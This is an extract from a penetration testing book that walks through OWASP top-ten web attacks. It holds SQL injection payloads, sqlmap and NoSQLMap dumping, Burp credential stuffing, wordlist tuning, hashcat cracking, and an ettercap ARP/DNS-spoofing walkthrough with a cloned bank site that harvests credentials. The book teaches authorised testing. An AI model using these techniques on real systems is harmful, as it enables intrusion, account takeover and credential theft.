The Penetration Tester's Guide to Web Applications
Artech House Information Security and Privacy Series
This innovative resource provides both professionals and aspiring professionals with insight into penetration testing web applications. It describes each of the Open Web Application Security Project (OWASP) top ten vulnerabilities, including broken authentication, cross-site scripting, and insecure deserialization, and details how to identify and exploit each weakness. Readers learn to bridge the gap between high-risk vulnerabilities and exploiting flaws to initiate shell access. The book demonstrates how to work in a professional services space to produce quality and thorough testing results by detailing the requirements of providing a best-of-class penetration testing service. It offers insight into solutions on how to approach a web app pen test and the challenge of integrating a mature pen testing program into an organization. Based on the author's many years of first-hand experience, this book provides examples of how to break into user accounts, how to breach systems, and how to configure and wield penetration testing tools.
Serge Borso is the founder and CEO of SpyderSec, an independent security consulting
organization specializing in penetration testing services, OSINT solutions, and security
awareness training programs. He is also an instructor at the SANS Institute and a private
cybersecurity consultant. He received his M.Sc. in computer systems security from
Colorado Technical University.
ARTECH HOUSE
BOSTON | LONDON
www.artechhouse.com
Serge Borso
All rights reserved. Printed and bound in the United States of America. No part of this book
may be reproduced or utilized in any form or by any means, electronic or mechanical, including
photocopying, recording, or by any information storage and retrieval system, without permission
in writing from the publisher.
All terms mentioned in this book that are known to be trademarks or service marks have been
appropriately capitalized. Artech House cannot attest to the accuracy of this information. Use of
a term in this book should not be regarded as affecting the validity of any trademark or service
mark.
10 9 8 7 6 5 4 3 2 1
Preface
1 Introduction
2 OWASP A1:2017 Injection
3 OWASP A2:2017 Broken Authentication
4 OWASP A3:2017 Sensitive Data Exposure
5 OWASP A4:2017 XML External Entities (XXE)
6 OWASP A5:2017 Broken Access Control
7 OWASP A6:2017 Security Misconfiguration
8 OWASP A7:2017 Cross-Site Scripting (XSS)
9 OWASP A8:2017 Insecure Deserialization
10 OWASP A9:2017 Using Components with Known Vulnerabilities
11 OWASP A10:2017 Insufficient Logging and Monitoring
12 Beyond the OWASP Top 10
13 Testing as a Consultant and Adding Value
14 About the Author
15 Index
Preface
Welcome to the world of web application penetration testing! The purpose of this book is to explain how a professional penetration tester attacks web applications. This book starts by providing some background information on penetration testing and web applications (web apps), discusses why we care about web applications, and proceeds to methodology and attacks. A primary focus will be on the OWASP top ten: identifying these flaws and exploiting them in a meaningful way. Throughout the chapters dedicated to specific vulnerabilities, special attention will be paid to making the content easy to understand, and each chapter will include examples, real-world stories, references to hands-on training, and final thoughts on the vulnerability in question. You will obtain a clear understanding of the details of the flaw, how to exploit the flaw, and the background information necessary to provide value to your organization. The world of web applications is vast and trying to fit everything into one book would not do justice to the reader; thus, some topics will not be covered in depth in this book.
The target audience of this book is people already performing penetration testing, primarily in-house penetration tests you conduct as part or all of your day job. People new to the world of penetration testing, perhaps researching the topic to help with bug bounty programs, or students should find it a helpful reference guide for protocol/professionalism and for gaining technical acumen. Professionals/consultants conducting penetration tests for clients will be able to leverage this book to enhance their current processes and skill sets. This book is meant for an audience equipped with intermediate-level web or application security skills. You should know the inner workings of TCP/IP, HTTP, and encryption. You should have experience registering a domain name, configuring a web server, setting up SSH keys and SSL/TLS certificates, and running a website at a minimum. You should be familiar with programming languages, know the difference between the web and the
internet, and be aware of OWASP, CVEs, CVSS scoring, and the like. Beginners or people new to web application penetration testing should be able to keep pace and understand most of the topics at a high level. Possessing a background in application security (appsec) will be helpful for fully understanding some concepts, just as experience with conducting professional engagements will help the reader understand other topics. Like anything in life, you will get out of this book what you put in, and as such, it may be in your best interest to ensure you are well versed in appsec to maximize your investment.
Penetration testing is different from vulnerability scanning, and web application penetration testing is significantly different from network penetration testing. When performing a web application penetration test we follow a four-step methodology: reconnaissance, mapping, scanning, and exploitation.
Reconnaissance is the act of information gathering and comes in the form of conducting research into our target organization (industry, location, employees, products/services, domains, hosting, DNS information, etc.), the target web application (language, CMS, open-source components, affiliations, platform/architecture, etc.), avenues of attack, web properties, and general accumulation of open-source information that we can leverage.
Mapping is how we understand the various relationships between components of the application. This is accomplished by browsing and spidering/crawling the application, looking for links, submitting forms, paying attention to how the application behaves, and essentially using the application as it was intended from a nonmalicious user's perspective. Once a map of the application has been established, more nefarious interactions with the application take place via actively scanning for vulnerabilities.
As a sidebar, note that during the reconnaissance phase it may become apparent that the content management system (CMS) being used by the application has a known vulnerability and matching exploit. Attempt to exploit it... spend up to about twenty minutes if the indicators of exploitation warrant this effort at this phase. Know that there is much more work to be done in order to get a comprehensive view of the attack surface of the web application, and this deviation, while warranted, should be cut short if the flaw is not readily exploitable. Take note of the potential for abuse and move back to the predefined methodology for testing.
Scanning is the next step in our four-step methodology and comes in the form of automated tools and hybrid approaches. Know that in the world of network penetration testing Nessus, Rapid7/Nexpose, Qualys, and the like dominate the market. These are not the only mature tools, but a web application scanner typically must be configured with
valid credentials if there is any hope of producing useful results. While this
concept may be foreign to some, it is absolutely imperative (in almost all
cases) that during our web application penetration testing we have credentials
to the application. Ensuring that our tool does not get logged out during its
scanning is also important as every subsequent HTTP request it makes may
be responded to with the likes of a 302 redirect to the login page, effectively
invalidating the rest of the scan. Special care must also be taken to ensure
the automated scanning does not cause harm to the application, its users,
or the back-end data store in the event that data is corrupted or otherwise
rendered unavailable. We'll talk about precautions to take and go into this
in more detail later in the book, but for now know that scanning takes effort
to do right and can provide useful results as we move to the next phase of
our methodology.
The final phase of our methodology is exploitation, and this comes in two forms: leveraging the work performed by others, for example, when we find a version number of software, search for a published exploit associated with that version, and proceed to use it; or performing the research and testing required to identify a more subtle vulnerability and crafting a working exploit to take advantage of it. Another very common way to exploit web application vulnerabilities is by understanding how a class of vulnerability works, like SQL injection, and identifying that flaw in our target application. For instance, detailed information specific to your application's SQL injection vulnerability is not going to be published in most cases, whereas the details of how to identify and exploit SQL injection in general are well documented. Depending on your skills and experience, your path to exploitation will vary.
Once exploitation has occurred, our four-step methodology starts over at
reconnaissance as we now will likely have access to features of the application
that are new to us such as administrative privilege or the ability to interact
with other users of the application in an unrestricted manner. Know that this
methodology is not meant to stifle our efforts but rather to guide our testing
to produce thorough and quality results in a professional manner; we don't
want to miss out on testing for certain vulnerabilities due to a haphazard
approach.
Also know that there can be significant differences between exploitation of web application flaws and OS flaws as it pertains to the impact of the exploitation and the level of access gained. Specifically, and importantly: Scanning a network, finding a vulnerability, matching that vulnerability to an exploit in Metasploit, and proceeding to gain shell access is not typically how the process works for web applications. In fact, exploitation of a web application [...] the vulnerability and even some actions that can be taken to remediate the finding. This
is important as our job as a penetration tester is not to simply break things
and move on, but rather to write a coherent, well-thought-out report that
the client or our place of business can leverage to gain a deep understanding of the flaw, the path to exploitation, as well as how to fix it.
The purpose of this book is to explain how a professional penetration tester attacks web applications; the goal is to help you become a more proficient web application penetration tester, but it's up to you to
get the most out of it! Let's get started, but before we do there is one last
important topic to cover.
Make sure you always obtain explicit written permission from someone
with the authority to grant it prior to engaging in penetration testing, includ-
ing using any of the concepts or tools discussed in this book, and understand
the author assumes no responsibility for your actions.
Chapter 1
Introduction
The OWASP Top 10 represents a broad consensus about the most critical
security risks to web applications. During a web application penetration test,
our goal is to attempt to identify vulnerabilities on the OWASP top ten list
as well as other prevalent application-centric vulnerabilities. Before delving
into each vulnerability, we'll take a moment to discuss web application penetration testing, how to best approach an engagement, as well as background information we'll need to be successful.
The internet is not the same as the web and a website is not the same as
a web application even though these terms are typically used synonymously.
A website refers to a static HTML document with links, images, perhaps some CSS, and that's about it. Using a website was a common way to
share information in the early days of the web. In contrast, a web application
is dynamic. Dynamic in the sense that it takes input, some form of stimuli,
and processes this input to produce an output. An example of this would
be Google's homepage. As an end user, we submit a query (input) in the
search box, press enter and are presented with search results (output). As
a user of this web application we can see the HTML, CSS, JavaScript, and
images required to render the page in our browser; this can be accomplished
by viewing the source code of the page. What we don't see is the server-side
source code, the Python/C++/Java, as this code is housed and processed
by Google's servers. Our browser reads the client-side code and renders the
page while the server-side code takes our input, parses (reads) it, performs
a series of logic operations such as applying its search algorithm, and looks
up the database contents before returning a subset of that information to
our browser to ultimately show us the search results. This is dynamic; there
is server-side processing, database lookups and interactivity built into the
platform.
This notion of dynamic is an important one as we delve into penetration testing and home in on what is called attack surface. When we embark
on assessing the security posture of a target application, the attack sur-
face is essentially the parts of the target system that are exposed. For a
typical network-based device such as a server, this would be akin to open
ports/listening services, user accounts with access to the system, patch man-
agement, change management, virus updates, replication, and other avenues
that could lead to compromise if manipulated to cause harm. For a website,
there is not much in the way of attack surface as there is no input that will in
turn be processed once submitted other than by the webserver software like
Apache, IIS, or Nginx. For instance, if there is not a database, there is no
risk of SQL injection (SQLi). If there is no input that is processed, then a lot
of the OWASP top ten vulnerabilities are not going to be present. However,
a dynamic web application, as opposed to a static website, is likely going to
have a database and, depending on the application, a significant amount of
input that can be manipulated to potentially cause harm to the target.
The target of our web application penetration testing is of course the web
app but the attack does not stop there. This book will make the appropriate
distinction between targeting the application and targeting the business or
users of the application like in the case of XSS. This is important because
impact can be measured in a variety of ways such as the impact to business
operations in the event of denial of service (DoS). To adequately perform
a web app penetration test, we have to take into consideration the CIA
triad, which should be familiar to all CISSP holders. If any of these three components (confidentiality, integrity, or availability) is compromised, then the ability of the target business to do its job in a secure fashion is severely impaired. As such, from a penetration testing perspective these are some of
the areas where we want to pay special attention when assessing the target
environment.
The target environment is what is defined in the scope of the penetration test. This will vary depending on the predefined rules of engagement. To simplify this, let's think about a few different scenarios in which we may be conducting a web application penetration test. The first scenario is a development version of our own personal WordPress blog. This blog resides on a virtual machine on our workstation at home. We update the blog as we see fit and once satisfied with the changes or new blog posts, we push those
changes to our production blog on the web. In this scenario, we want to test our development version running on our virtual machine on our network on our workstation in our own home: We need absolutely no one's permission to do this test. We completely own every aspect of the target environment despite the fact that we did not write the WordPress software ourselves. We also didn't write the Apache software running the website, or the Linux operating system, or the drivers, or the BIOS, or... The point is that no special permission is required to conduct this test and we are fully aware of the scope of what we want tested, in this case only the WordPress web application. But understand that as we make HTTP(S) requests to our web app, those requests will be served by Apache, which does run atop an operating system (OS); thus, while the scope of our test may seem well defined, in fact, the testing may encompass OS and platform patches/vulnerabilities as well as TLS and certificate implementation and configuration, which is no longer strictly testing the web app.
The second scenario to consider is a web application penetration test of our corporate flagship web app at our place of business. This application resides on premises in our data center behind multiple layers of security including an IPS, firewall, and WAF. The business we work for owns the infrastructure providing the platform for the web application. However, the codebase is written by a third-party company and our business does not have access to the source code. As with most mature organizations, there are multiple versions of this application in multiple environments such as development, QA, user acceptance testing (UAT), and production (PROD). This application is required to be tested for regulatory compliance. Which version of the application do we test? Do we test remotely from the internet, having our traffic filtered by multiple devices along the way, or internally to bypass those controls? Do we test using credentials and leverage an automated scanning tool, and if so, how will that impact other users of the system and the database? What about permission from the third party maintaining and releasing the code; do we need their permission to test their application?
Let's talk about these, starting with the scope of the test. The objective is to perform a web application penetration test of the target web app, which is required for compliance, so we have to test it or get evidence (and a recent report) that the company writing the code is performing penetration testing. This is not the same as static/dynamic code scanning or vulnerability scanning; recall that penetration testing has different goals than scanning for vulnerabilities, a specific methodology, a potentially high risk for negative impact, and a significant effort dedicated to the manual component
of the testing. Generally speaking, since the application resides in our environment, we can test it as we see fit without any need to seek or obtain approval from the authors of the code (noting that we are not entitled to reverse engineer the software).
Testing from the internet, having our traffic sent through the firewall, IPS, and WAF when we are not whitelisted on these devices, can result in much less of a test of the web application and more of a test of these traffic-filtering devices positioned logically in front of and protecting the web application (as seen in Figure 1.1). When the objective is to test the web application, I find it best to either be whitelisted on these devices, test internally to avoid these devices, or clearly understand and communicate that the results of testing may be more prone to false negatives. The reason for this is that we want to identify vulnerabilities on the web application and attempt to quantify the level of risk: If there is a SQLi flaw on the application and the WAF blocks our SQLi attacks to the point where we are unaware of the flaw, this type of testing arguably is not providing the most value to the business if the objective is to identify application layer vulnerabilities. There may be a time when the WAF is no longer in place, or not tuned the same way, or a filter bypass is discovered, or an avenue of attack does not traverse the WAF; these are all good reasons why the business and application developers would benefit from learning about the SQLi flaw. An argument from the business on this logic may bring to light that attackers are going to be sending traffic from the internet and having their packets filtered; thus, a fair and realistic test would be to leave those devices in place. This is not illogical and essentially becomes a discussion to have with the business.
In many cases the production version of the application is tested as opposed to the development or QA or other versions. There are several reasons why: First, I think that it would be hard to justify robust, high-quality penetration testing on all versions of the application; this would be more of
Figure 1.1 This image is meant to depict the general flow of traffic.
[...] other than our developers and security team are responsible for securing the code and platform. Thus, the same controls such as firewalls, IPSs, and WAFs are still part of the conversation; they are just virtualized and offered as a service.
To finish the discussion on scoping and rules of engagement/testing requirements, know that subdomains (host.example.com, host1.example.com, etc.) may also be in scope but potentially hosted somewhere else completely. Also, we want to focus on identifying and exploiting, at a minimum, the OWASP top ten vulnerabilities, knowing that there are many other vulnerabilities and categories of flaws we need to attempt to identify and exploit. What OWASP has done with its top ten list is highlight the most common and impactful flaws typically impacting web apps, and as such these flaws will serve as the backdrop of a large portion of this book.
Modern web applications don't have SQLi on the login page; they have proper security headers in place and employ TLS with a well-configured certificate and cipher suite. Development frameworks and libraries have built-in protection for Cross-Site Request Forgery (CSRF/XSRF) and Cross-Site Scripting (XSS). Cookies and authentication tokens are sufficiently randomized/complex and set with Secure, HttpOnly, and SameSite flags. PCI dictates account lockouts, password strength meters are somewhat common, and mature applications/organizations host their products behind multiple layers of security. Easy-to-identify and impactful-to-exploit vulnerabilities are becoming harder and harder to find. Know your target environment, know the impetus or driving force behind the penetration test, and plan accordingly to put yourself into a position to get the best results, because there are vulnerabilities to be found and exploited. Remember, we want to break into these applications, gain access to sensitive information, compromise accounts, get shell access, escalate privileges, and own the environment; do what you need to in order to set yourself up for success!
Chapter 2
OWASP A1:2017 Injection
[...] differences in how the application responds are our key to identifying the flaw and will be a recurring theme for identifying other vulnerabilities later in this book. For example, the input of test should be benign and not cause an issue, whereas the input of test' may cause an error with the application due to the single quote character being interpreted literally by SQL. By submitting both of these inputs, one at a time, to the application and simply noticing how the application responds to each input, we may be able to easily identify a SQL injection issue. For instance, if the application's response results in a page stating, "No results were found" when test was submitted and "There is an error in your SQL syntax" when test' is submitted, we can deduce there is likely an injection flaw in the application.
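As a quick sketch of this probe from the command line (the URL and parameter are hypothetical stand-ins for the target's search form; %27 is a URL-encoded single quote):

curl -s "http://target.example/search?q=test" -o baseline.html
curl -s "http://target.example/search?q=test%27" -o quoted.html
# A size or content difference, such as a SQL syntax error appearing only in
# quoted.html, suggests the input is reaching the database unsanitized.
diff baseline.html quoted.html | head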
Another thing to consider when working with injection flaws is blind injection, meaning that there is less of an obvious indicator that the application may be vulnerable. There are varying degrees of blindness ranging from not blind at all (an error message is displayed to the user when an injection attack is submitted), to partially blind (no error messages are displayed but discernible differences in behavior are evident) as in the case of time-based attacks (when we inject a command telling the SQL query to wait for an attacker-defined period of time before returning the query results), to completely blind where we have no real indicator that the application is vulnerable... but it is. There are situations where blind injection (SQL, command, LDAP, and other forms) is a logical vulnerability to test for, in which case we need to be prepared to launch injection attacks that can still yield identifiable results even if those results are not always evident in our browser. To do this we need to set up a VPS accessible to the internet or otherwise accomplish the same goal using a locally hosted machine.
VPS hosting is cheap and we don't need significant resources for what we are trying to accomplish; specifically, a Linux OS which we can SSH to and have root access on will suffice. This setup with one virtual CPU, one gigabyte of RAM, and twenty gigabytes of disk space is more than sufficient and costs pennies to run on a per-hour basis. What we want to do is take note of the IP address of the VPS and execute tcpdump to listen for incoming traffic (other than our own SSH traffic) as seen in Figure 2.1. Now when we execute our next command injection attack we can use the attack payload to force the target to connect back to our VPS, where traffic arriving at the listener confirms the flaw even when nothing is visible in the browser.
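A minimal listener along these lines, assuming eth0 is the VPS's public interface and 203.0.113.50 is our own SSH client address (both placeholders):

# Show all incoming traffic except our own SSH session.
tcpdump -n -i eth0 'not (host 203.0.113.50 and port 22)'
# An injected payload such as ping -c 1 <VPS-IP> or curl http://<VPS-IP>/ on the
# target will then show up here as ICMP or HTTP traffic, confirming blind execution.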
Examples: For this first example we will be targeting a form with three different input fields. Visible on the page are input boxes associated with Product, Customer, and Account Password. To first get a baseline of how the application should normally process input and return output, we will submit test as the input for the Product and Customer text boxes and submit the form by clicking View, as seen in Figures 2.2 and 2.3, respectively.
The resulting page shows the query, including the rudimentary authentication mechanism, worked and no results were returned. Next we will perform the same action, only substituting test with test' (note the single quote character) and refer to Figures 2.4 and 2.5. The hope is that we will see a different result, in effect confirming the application is dynamic and the inputs we submit are being used to perform a query.
[...] from MS SQL syntax, for example, and knowing which language is being used will help us craft our attack in a manner for it to be successful. A typical query apropos for this example might be, "SELECT * FROM tablename WHERE product='$productname' AND customer='$customername'". Based on this pseudocode (query) the two parameters, "productname" and "customername", are what we as an attacker can inject into, thus potentially changing the results of the query. For instance, instead of submitting test' in the Product input field, let's see what happens when we submit test' or '1'='1' into the Product input box as seen in Figure 2.6. The output shows results for all of the products in the database of the vulnerable application. Further and meaningful exploitation of this finding will hinge on what other data is in the database, and while we could find this out manually, now is a fair time to introduce a tool to help automate this attack. The tool we will be using is called sqlmap, which is an open-source Python-based tool specifically written to aid in SQL injection attacks. The best way to become familiar with the tool, in addition to using it repeatedly in various circumstances, is by invoking it on the command line with the -hh option to see a quick reference of its options as seen in Figure 2.7.
Figure 2.9 sqlmap command line syntax specifying POST payload via "data"
argument.
By specifying the dump option we are able to dump the contents of the
database successfully, as we can see in Figure 2.12.
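As an illustrative invocation (the URL and parameter values are placeholders, not the lab's actual values), sqlmap can be pointed at the same POST request and told to dump what it finds:

sqlmap -u "http://target.example/products.php" --data "product=test&customer=test" --dump
# --data supplies the POST body whose parameters sqlmap will test for injection;
# --dump extracts table contents once an injectable parameter is confirmed.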
Figure 2.14 NoSQL injection attack strings being submitted via the HTML form.
Note once again that in a real-world scenario an evident error message is not always present, and even when we are presented with an error, the message may not be clear or helpful. As we have been presented with an error, we could manually continue to exploit the application, the success of which will hinge on our knowledge of the back-end database, the syntax, and our mastery of the SQL (NoSQL) language. In this case it may be beneficial to once again look to a tool to assist in the exploitation of the flaw. Akin to sqlmap, NoSQLMap is a tool that attempts to aid in NoSQL injection attacks. It is not as mature, reliable, or as feature-rich as its namesake, but we can attempt to use it in this scenario. To do so, we can invoke NoSQLMap via the command line and proceed to set the required parameters before executing the attack. We can follow Figures 2.16, 2.17, 2.18, and 2.19 for insight into how to do this.
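As a rough sketch, assuming the commonly distributed codingo/NoSQLMap build, the tool is cloned and launched like so, with the target set through its interactive menu:

git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python nosqlmap.py
# NoSQLMap is menu-driven; the target host, port, and web app attack parameters
# are set from its prompts before the injection attack is launched.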
Figure 2.18 NoSQLMap executing its initial attacks on the target application.
Figure 2.19 NoSQLMap showing a successful injection and applicable vulnerable URLs.
The results of the attack can be viewed in a browser to reveal the dump of
database information as shown in Figure 2.20.
Chapter 3
OWASP A2:2017 Broken Authentication
Details: The second most critical web application security risk is Broken Authentication, and the previous definition is provided by OWASP (as others will be in subsequent chapters). The concept of Broken Authentication encompasses many flaws that we will discuss in this chapter. Web applications utilize the HTTP protocol to communicate, which is stateless in nature. This means that every request a user/client sends to a web application is treated and understood as a new request, unaffiliated with previous requests. This inability to natively group a series of requests together has obvious shortcomings; for instance, how does a web application know who a user is? The answer to this is some form of session management, a means by which the application can establish an understanding that requests with a unique identifier should be treated as the same user, essentially. This unique identifier is typically a cookie or token, but it doesn't have to be. Any unique string sent back and forth from the client to the server will suffice, as long as the application and client can keep track of it. Session management can be implemented in the form of a unique string in the address bar of our browser, as is the case with a Java Session ID as seen in Figure 3.1.
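For illustration, the same session identifier can travel either in the URL or in a cookie; the values below are fabricated:

http://app.example.com/account;jsessionid=6A3F19CA0B92D4E1
Set-Cookie: JSESSIONID=6A3F19CA0B92D4E1; Path=/; Secure; HttpOnly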
What happens when a user submits this form? What back-end processing/logic is being employed to check if the values submitted by the user
are valid and how does the application handle errors, invalid input, password
hashing, session management, password resets, account creation, two-factor
authentication, failed login attempts, account lockouts, request throttling, IP
banning, dictionary attacks, logout requests, and so forth? Creating a website that has a login form is not overly challenging, but creating a pleasant user experience while implementing sufficient security controls is extremely challenging, which is why this is the second most critical web application security risk: It's hard to do well. And to be clear, there is no standard way
to implement this type of authentication as a developer can choose to ask
whatever questions they like, as well as integrate with multifactor solutions
or even biometrics if desired. Conversely, the level of security implemented using forms-based authentication can be essentially nonexistent; the
approach taken when using this method is entirely nonstandard.
Real-World Dialog: One of the more interesting fails I have seen throughout my career as a penetration tester is a rather oddly implemented password reset feature on a custom application in the financial sector. The web application I was testing looked like any other modern web application, complete
with common features such as the ability to create your own account, login,
change your password, access a dashboard, and so on, as well as the option
to reset your password in the event that you forgot it. Study Figure 3.4
and think about how the application ought to work given this background
information.
Logically we might provide our username and email address, submit them, and the application will in turn check to see if the email address is valid and belongs to a user account corresponding to the username that we provide. This way, the user submitting the form has to know the username and email address associated with that username in order to successfully issue a password reset request. Following this logic, if the username and email address are valid and associated with each other, then the application will send a password reset link to the provided user's associated email address. Seems easy...
In reality what this form did was allow a user to put in a username and ANY ARBITRARY email address the user wanted. It then checked to see if the username was that of a valid user account, and if it was, then the application would send the password reset link to the email address indicated by the user (as opposed to the email address associated with the account). This was of particular concern due to the application being vulnerable to username harvesting/account enumeration. This means that I was able to confirm valid users of the application using the username harvesting flaw, reset their passwords, and receive the link to update their password in my inbox! This type
[...] let's be smart about this attack: If the application clearly enforces password complexity requirements for user accounts (like a minimum of 8 characters, at least one uppercase/lowercase/number/special character, etc.), then we need to modify our password input list to conform to the requirements; otherwise we are just wasting time and lacking professionalism. On this professionalism topic, also consider the sheer number of requests we will be sending for this attack and the impact this can have on the web application, infrastructure, and business (10,001 user accounts times 1,000,000 password guesses equates to over 10 billion requests), so be sure to plan accordingly. We can accomplish the automated portion of this attack by using a custom-written script or an interception proxy tool such as Burp Suite. When using Burp Suite, we first prime the interface by using our browser integrated with the proxy to make a login request to the application and choose to send that (typically POST) request to Burp's Intruder feature as seen in Figure 3.5.
Burp Intruder is a fuzzing tool which we can use to automate the attack by populating the username and password parameters with the lists of usernames and passwords previously discussed. Burp Intruder will then, depending on how we configure it, proceed to try to log in to every username we provided using all one million passwords and continue to do this for each account, hence the excess of ten billion requests. For this example we will not need or want to send so many requests; also note the cluster bomb option and utilize Burp's help section for details on the injection options available.
In order to specify multiple payload positions with differing payload lists, the cluster bomb option is ideal. In this fashion we can specify the usernames and passwords we want to attempt to log in with, as seen in Figure 3.6.
The first payload set (from left to right, top to bottom per the previous Positions tab in Burp) is the usernames while the second payload set is the passwords. We can see the configuration for this in Figure 3.7. Once this attack is launched, Burp will proceed to attempt to log in with each username and password combination until it exhausts its input lists.
The results of this credential stuffing attack are not evident unless we know what to look for. When a successful login occurs (our attack was able to guess the right username and password combination) the application may issue a redirect (HTTP response code 302) or the size of the response may be larger than that of failed logins. It is incumbent upon us to identify what constitutes a successful login and use this information to identify when accounts were successfully compromised.
Guessing passwords is not ideal although it is an attack focused directly
on the application (and indirectly on the guessability of weak passwords) and
it works in many circumstances. There are, however, other ways to exploit
broken authentication, such as bypassing it completely.
One such bypass technique is attempting to directly access the pages (or functions) of an application without logging in first. This method requires knowledge of the protected pages: the pages of the application which should only be accessible when logged in. For single-page applications there is less focus on the page, since there is only one, and more of a focus on the function/endpoint being called. For traditional and single-page applications, the best way to go about testing for this flaw is by leveraging our test credentials while making note of the pages or functions which are accessible once logged in. [...]
[...] as attackers we need to identify which controls are in place in order to tune our attacks to bypass the control. For example, noticing how many failed login events it takes to trigger an account lockout, and determining how long the account will remain locked out before automatically being reset. This can be identified by locking out a legitimate account and tracking how many failed logins were required to trigger this condition in a given timeframe.
Figure 3.12 The password policy for user accounts of a given web application.
This can be accomplished by starting with a list of passwords (such as from /usr/share/wordlists/rockyou.txt.gz in Kali) and using bash to filter out only the conforming passwords from the 14 million+ passwords in the file. A command to output all 8+ character words can be seen in Figure 3.13.
Figure 3.14 Grepping filtered results for strings with at least one number.
A command to output all 8+ character words with at least one number and
at least one special character is shown in Figure 3.15.
Figure 3.15 Grepping filtered results to match strings with special characters.
These efforts took the initial input of over 14 million passwords and pared them down to just over 450,000 passwords that all meet the password complexity requirements of the target web application. Taking this approach results in a wordlist which has been tuned to yield the best results.
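A sketch of such a pipeline, assuming the gzipped Kali wordlist and a policy of 8+ characters with at least one number and one special character:

# Filter rockyou down to policy-conforming candidates only.
zcat /usr/share/wordlists/rockyou.txt.gz \
  | grep -aE '^.{8,}$' \
  | grep -aE '[0-9]' \
  | grep -aE '[^a-zA-Z0-9]' > tuned-wordlist.txt
wc -l tuned-wordlist.txt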
Chapter 4
OWASP A3:2017 Sensitive Data Exposure
Details: The exposure of sensitive data comes in several forms and typically stems from an application owner failing to properly protect data at rest (in the database) or in transit. We as attackers can take advantage of this flaw once we identify it. The scope of this flaw can be weaknesses in client-side security as well as server-side security, as both endpoints have to be configured correctly to effectively reduce the likelihood of this type of attack causing harm. Sensitive data essentially equates to anything that should be kept private, could be used to compromise the session, cause a breach, or is otherwise a prime target for an attacker. Such data would be the session token, credit card information, credentials, keys, or financial records. To gain access to these resources we can rely upon other OWASP top ten vulnerabilities such as Injection, Cross-Site Scripting, XML External Entities, and others to provide the initial point of access. There are, however, somewhat passive ways we can identify where to look to find likely paths to the exposure of sensitive information. HTTP headers are a smart place to look,
specifically paying attention to how the application tells the browser to cache resources and checking to see if the HTTP Strict Transport Security (HSTS) header has been set. HSTS is a means by which an application can force browsers to communicate with the application over an encrypted connection. When this header is not in place and both HTTP and HTTPS connections are available for a web server (even if a redirect from HTTP to HTTPS exists), we as an attacker may be able to compromise the connection and expose sensitive information. In addition, browsers will cache pages even over HTTPS depending on how the web server is configured, which means that on the client side there may be an exposure of sensitive information that can be subsequently compromised.
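The header itself is a single line in the HTTP response; a typical value looks like this:

Strict-Transport-Security: max-age=31536000; includeSubDomains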
There are other times when an application may be configured to store sensitive information in a hashed form in the database, such as users' passwords, but when the wrong hashing algorithm is in use this too can lead to predictable results. A famous case study is the repeated Yahoo! breaches, in which it was made public knowledge that the multibillion-dollar company was hashing users' passwords with an algorithm inappropriate for this task: MD5. In this case the password hashes were compromised and subsequently many were cracked with ease. The idea of an application exposing sensitive data can stem from insecure settings, a lack of proper configuration, and the like. We as an attacker can take advantage of this by looking for a lack of encryption or weak cipher suites, case insensitivity with password inputs, or otherwise weak hashing algorithms and cacheable sensitive information.
[...] ensure the victim attempting to access the intended web application was instead communicating with my machine over HTTP. The HTTPS redirect never happened, the browser never knew to connect over HTTPS to verify the authenticity of the web server, and subsequently, when my fake website presented the user with input boxes requesting credentials, the victim happily provided them. I, in turn, was able to redirect the user to the real website to avoid suspicion while using the credentials myself to gain access to their account.
[...] for the page(s) of interest. Once loaded, click the back button in the browser to see what was previously entered in the input boxes or in the address bar via a GET request. Note that each browser handles history, cached content, and saved form data differently, and thus this method may not directly divulge sensitive information, but sometimes it can, as seen in Figure 4.1.
[...] known user account (possibly) or public company to associate with the compromised data.
On the command line, password cracking tools typically take several arguments, such as the input file comprised of the hashes we want to crack (in the correct format), the type of cracking we want to perform (dictionary-based, brute force, etc.), perhaps an output file, and the type of hashes to be cracked. For example, to successfully use the hashcat tool we will first download and compile it, as this helps to ensure any special hardware at our disposal is leveraged in our build:
git clone https://github.com/hashcat/hashcat.git
cd hashcat && git submodule update --init
make && sudo make install
If successful, this should result in a binary/executable version of hashcat
we can now run with this command and arguments:
hashcat -m 0 -o Cracked MD5Hashes rockyou.txt
The hashcat tool does have specific hardware requirements and is also installed by default in Kali Linux. There are other options for tools, such as John the Ripper, which is invoked in much the same way as hashcat. We can see in Figures 4.3 and 4.4 the hashes and invocation of the tool, respectively.
Figure 4.5 Using our browser to save the client-side components of a website.
From here we can simply copy the resulting files (a home page and a folder containing the content) to our own web server's home directory and start Apache to serve the spoofed copy on our own web server. The examples below convey how to accomplish this, the results of which can be seen in Figure 4.6. Some modifications to the HTML and local content references may be necessary to make sure images show up properly and links work as expected.
# cp -r Downloads/"Bank Website"* /var/www/html
# cd /var/www/html
# cp "Bank Website.html" index.html
# service apache2 start
# firefox 127.0.0.1
Figure 4.6 View of our copied banking website being served locally.
Once we are satisfied with the copied website, we can now focus our attention on ettercap to launch the DNS poisoning attack. Before starting ettercap we need to modify its DNS configuration file in /etc/etter.dns. The file is well commented; what we need to do is place our target domain on a new line defining our attack server's IP address, which should be the same host on which we are running our Apache web server. For this example, our target/victim's host is 10.8.40.6, our attack machine (running Apache) is 10.8.40.4, and the website we are going to impersonate is bigexamplebank.com. Thus, the resulting etter.dns file would contain a new line like this (with tabs between each field):
bigexamplebank.com A 10.8.40.4
With the DNS configuration complete we can now run the ettercap tool with this command:
ettercap -T -i eth0 -M ARP -w output -P dns_spoof /10.8.40.6///
• -T: Specifies to stay in text mode
• -i eth0: Specifies our network interface
• -M ARP: Specifies to launch an ARP poisoning attack
• -w output: Chooses the file to write output to
• -P dns_spoof: Specifies the dns_spoof plugin to load, with /10.8.40.6/// targeting the victim host
Figure 4.7 Browser view of spoofed website matching legitimate domain name.
At this point a victim would think they are on the legitimate website (unless they paid special attention to the lack of HTTPS in their browser's address bar) and proceed to log in with their credentials. In a different setup, we could choose to route their requests to the legitimate website, essentially acting as a relay server between the victim client and the insecure host/domain (the banking website in this example). In this fashion we can gather credentials and gain access to the legitimate banking website. We could even set up a spoofed 2-factor authentication prompt and relay that to the legitimate website to gain access to the victim's account.
